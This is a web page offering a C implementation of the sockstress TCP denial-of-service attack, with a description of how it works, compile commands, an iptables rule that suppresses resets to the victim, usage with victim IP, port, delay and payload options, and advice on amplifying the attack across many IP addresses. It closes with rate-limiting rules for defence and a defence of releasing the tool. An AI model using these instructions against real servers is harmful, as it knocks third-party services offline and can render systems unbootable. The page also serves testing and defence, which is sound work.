3

Sockstress Tools & Source Code

Sockstress is a Denial of Service attack on TCP services discovered in 2008 by Jack C. Louis from Outpost24. It works by using raw sockets to establish many TCP connections to a listening service. Because raw sockets are used, connections are established without having to save any per-connection state on the attacker's machine.

Like SYN flooding, sockstress is an asymmetric resource consumption attack: It requires very little resources (time, memory, and bandwidth) to run a sockstress attack, but uses a lot of resources on the victim's machine. Because of this asymmetry, a weak attacker (e.g. one bot behind a cable modem) can bring down a rather large web server.

Unlike SYN flooding, sockstress actually completes the TCP 3-way handshake, and is not thwarted by using SYN cookies. In the last packet of the three-way handshake a ZERO window size is advertised -- meaning that the client is unable to accept data -- forcing the victim to keep the connection alive and periodically probe the client to see if it can accept data yet.

This implementation of sockstress takes the idea a little further (actually, Outpost24's code does this too) by allowing the user to specify a payload, which will be sent along with the last packet of the three-way handshake, so in addition to opening a connection, the attacker can request a webpage, perform a DNS lookup, send email to a SMTP server, or anything else that can fit in one packet.

For more information on sockstress, see Sockstress on Wikipedia or listen to the SecurityNow! Sockstress Episode.

Download Sockstress

The source code to our public domain C implementation is on GitHub
Download the original Sockstress C source (by Outpost24): sockstress-outpost24.tar.gz (232 KB)

The rest of this page is about our implementation.

Compiling

Our sockstress code has been tested on Debian Linux, using the GCC compiler.

# gcc -Wall -c sockstress.c
# gcc -pthread -o sockstress sockstress.o

How do I use sockstress?

WARNING:

The sockstress attack has been known to render some operating systems unbootable. NEVER run it on any system unless all data has been backed up and you are prepared to re-install the OS. Also be aware of any network devices that save connection state (such as NAT routers) between the attack machine and victim machine. They will crash too.

Sockstress uses raw sockets, so you must run the tool as root. You must also stop your OS from sending RST packets to the victim in response to unrecognized SYN/ACKs sent during the attack. To do so, set an iptables rule:

# iptables -A OUTPUT -p TCP --tcp-flags rst rst -d xx.xx.xx.xx -j DROP

Where xx.xx.xx.xx is the victim's IP address.

To view the sockstress help menu, run:

# ./sockstress -h
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
Usage: ./sockstress <ip>:<port> <interface> [-p payload] [-d delay]
        <ip>            Victim IP address
        <port>          Victim port
        <interface>     Local network interface (e.g. eth0)
        -p payload      File containing data to send after connecting
                        Payload can be at most 1000 bytes
        -d delay        Microseconds between SYN packets (default: 10000)
        -h              Help menu

 **You must configure your firewall to drop TCP reset packets sent to <ip>**

To execute an attack, sockstress requires three parameters:

  1. Victim IP
  2. Victim port
  3. Network interface to send packets from (e.g. eth0)

For example, to run an attack on port 80 on 127.0.0.1, run:

# ./sockstress 127.0.0.1:80 eth0

Sockstress also allows the user to control the delay between sent SYN packets. This value is specified in microseconds with the -d option. For example, to send a SYN packet every second, run:

# ./sockstress 127.0.0.1:80 eth0 -d 1000000

You can also have sockstress send some data to the victim after the connection has been established. Do this by specifying a file containing the data with the -p option. For example, to make HTTP requests:

# ./sockstress 127.0.0.1:80 eth0 -p payloads/http

... where payloads/http contains:

GET / HTTP/1.0

Example payloads for making DNS requests, requesting web pages, and sending mail with SMTP are provided with the source code.

To run a sockstress attack against multiple ports, you must run multiple instances of the tool. The attack can be amplified by assigning many IP addresses to a single machine and running an instance of the attack from each IP. This improves the attack because sockstress will quickly establish a connection from every source port, so more IP addresses are needed to open more connections (more sets of source ports).

How can I prevent sockstress attacks?

The only way to completely prevent sockstress attacks is to whitelist access to TCP services. This is not practical in most situations, so the best that can be done is to rate limit connections with iptables.

To block an IP after it opens more than 10 connections to port 80 within 30 seconds, install the following iptables rules:

# iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
# iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP

Source: http://codingfreak.blogspot.ca/2010/01/iptables-rate-limit-incoming.html

Note that sockstress attacks are still possible even with these rules in place. The attacker just needs more IP addresses to mount a successful attack.

You're probably wondering what it looks like to be under attack by sockstress. The output of netstat -tn will look something like this:

...
tcp6       0      0 192.168.1.10:80         192.168.1.102:16022     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:26244     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:6786      ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:1676      ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:9440      ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:22446     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:48356     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:21740     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:30341     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:62594     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:14492     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:31940     ESTABLISHED
tcp6       0      1 192.168.1.10:80         192.168.1.102:39136     FIN_WAIT1  
tcp6       0      0 192.168.1.10:80         192.168.1.102:54779     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:59578     ESTABLISHED
tcp6       0      0 192.168.1.10:80         192.168.1.102:38544     ESTABLISHED
...

Is releasing this code ethical?

Sockstress code has existed in the wild since (at least) 2011:

Sockstress is still effective. However, any packet hacker could easily write a sockstress attack tool. For this reason, I feel it is best to release my sockstress tool so system administrators can test their systems and stronger defences can be developed.